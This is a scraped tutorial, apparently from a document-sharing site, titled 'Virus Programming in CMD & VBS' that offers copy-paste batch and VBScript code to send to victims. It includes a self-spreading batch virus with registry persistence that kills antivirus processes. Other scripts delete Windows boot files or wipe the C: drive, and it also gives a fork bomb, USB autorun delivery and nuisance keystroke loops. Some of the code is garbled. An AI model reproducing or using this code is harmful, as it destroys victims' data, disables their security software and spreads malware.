Sei sulla pagina 1di 12

@copyright by Jeremy Sagario

jeremysagario555@gmail.com

VIRUS PROGRAMMING IN CMD & VBS


SCREEN FLASH BATCH FILE

This batch file can make your screen flash random colors until you hit a key to stop it,
Just copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nuldel \z.dbg

Or you can

But if you want to prank a friend then do the same with this code,
if any key is pressed it turns the screen blackThe only way to stop it is by using CTRL-ALT-DELETE.

@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
HOW TO CREATE AUTO-RUN FILES FOR VIRUS OR PRANK
EXECUTIONS

Auto-Run files can be useful if you want to execute any virus into your victims computer
with a PenDrive. It will help you make your execution much easier.

Instructions:
1. Open Notepad
2. Type :
[autorun]
open=anything.exe

Icon=anything.ico
4. Save your Notepad file as autorun.inf

Now just take this file and your exe and paste them into your pendrive.

Remember to rename anything.exe


===================================================

FORKBOMB VIRUS

Simplest virus
called FORKBOMB virus
just open notepad
and type in

%0|%0
and save as anything.bat
Very simple to remember

This virus will jam the processor and hang/crash the computer.
It doesn't do any damage though.
Just restart and it will be fine

CREATE A DANGEROUS BATCH FILE VIRUS

In this post i am going to give you dangerous virus code which is written in Batch
Programming language.

This virus can :1.Copy itself into startup


2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer

copy this code into notepad and save as anything.bat (while saving select all files ).

Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
startcalc
copy %0 %Systemroot%\Greatgame>nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f >nul
copy %0 *.bat >nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskillmsnmsgr
tskill LimeWire
tskilliexplore
tskillNMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

DESTROY ANY COMPUTER EASILY WITH ONE CLICK


Do not try this at your own computer: Well remember that u don’ttry this @ ur own computer

in any circumstances because the filewe are going to create will reboot the computer once and
also delete all the file needed by the computer to restart again,so u got it right well if u r pranking
with ur friend or ur enemy remember that his or her will never restart unless new Windows is
installed.

Here is the Guide to Destroying Virus:


Open up notepad and copy and paste this:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

And SAVE this file as .bat


Now that’s it ur Virus is ready well it’s a Monster Virus .
Remember Don’t click on this file in ur Computer.

HARD PRANK: PICK YOUR POISON


It asks your enemy to choose a number between 1-5 and then does a certain action
FOR ARCH ENEMIES ONLY
SEND USING ANONYMOUSEMAIL

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill
yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your
computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.


==================================================

PRANK:OPEN NOTEPAD CONTINUALLY IN YOUR FRIEND'S


COMPUTER:
IN NOTEPAD
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

PRANK:FRUSTRATE SOMEONE BY MAKING THIS VBSCRIPT


HIT BACKSPACE SIMULTANEOUSLY:
This will display a message and make vbscript hit backspace continuously

IN NOTEPAD
TYPE:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

COMPUTER GHOST
This will open Notepad, slowly type "Hello, how are you? I am good thanks" after some time
of clicking the file and freak your friend out out:

IN NOTEPAD
Type :

WScript.Sleep 180000 (you can change the sleep timings)


WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.
FRUSTRATE YOUR FRIEND BY MAKING THIS VBSCRIPT HIT
ENTER SIMULTANEOUSLY:
IN NOTEPAD
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.

CONTINUALLY POP OUT THE CD DRIVE.


Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")


Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

TOGGLE YOUR FRIEND'S CAPS LOCK BUTTON


SIMULTANEOUSLY:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

BATCH FILE TRICK TO DELETE C: DRIVE


@Echo off
Del C:\ *.* |y

10 MOST DANGEROUS VBSCRIPT PRANKS


1) Convey a little message and shut down the computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Save it as "Anything.BAT" in All Files and send it.

2) Toggle the Caps Lock button simultaneously:


Type :

Set wshShell =wscript.CreateObject("WScript.Shell")


do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out the CD Drive. If there are more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")


Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate someone by making this VBScript hit Enter simultaneously:


Type :

Set wshShell = wscript.CreateObject("WScript.Shell")


do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.


5) Open Notepad, slowly type "Hello, how are you? I am good thanks" after some time of
clicking the file and freak someone out:

Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate someone by making this VBScript hit Backspace simultaneously:


Type :

MsgBox "Let's go back a few steps"


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack the keyboard and make it type "You are a fool" continuously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")


do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:


Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-
5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill
yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your
computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

EASY VIRUS TO MAKE EVERYTHING GO WRONG


1. Ends Process, NAVAPSVC.exe
2. Ends Process, Explorer.exe (taskbar and icons will dissapear)
3. Ends Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

Just Copy This Below code In Notepad, Save as anything.bat and you are done!

<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>

title virus is my dna


color 0A
@echo off
set end=md “any message you want”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * any message you want
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * this is just the beginning.
msg * any message.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

Potrebbero piacerti anche